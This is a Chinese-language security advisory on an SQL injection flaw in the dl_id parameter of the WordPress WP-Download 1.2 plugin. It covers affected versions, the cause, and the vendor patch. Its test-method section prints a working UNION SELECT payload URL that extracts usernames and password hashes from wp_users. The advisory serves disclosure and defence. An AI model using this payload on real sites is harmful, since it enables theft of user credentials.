安全研究

安全漏洞
WordPress wp-download插件dl_id参数SQL注入漏洞

发布日期:2008-03-31
更新日期:2008-04-02

受影响系统:
WordPress wp-download 1.2
不受影响系统:
WordPress wp-download 1.2.1
描述:
BUGTRAQ  ID: 28516

WordPress是一款免费的论坛Blog系统。

WordPress的WP-Download插件实现上存在输入漏洞,远程攻击者可能利用此漏洞获取登录相关的敏感信息。

WordPress的WP-Download插件中的wp-download.php文件没有正确地验证对dl_id参数的输入,允许远程攻击者通过提交恶意的查询请求执行SQL注入攻击。成功利用这个漏洞可能导致检索用户名和口令哈希,但攻击者必须知道数据库表格前缀。

<*来源:BL4CK (bl4ck00@gmail.com
  
  链接:http://secunia.com/advisories/29608/
        http://milw0rm.com/exploits/5326
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://www.example.com/wp-content/plugins/wp-download.php?dl_id=null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/*

建议:
厂商补丁:

WordPress
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.arno-box.net/wordpress/12/wordpress-plugin-wp-download/

浏览次数:3480
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障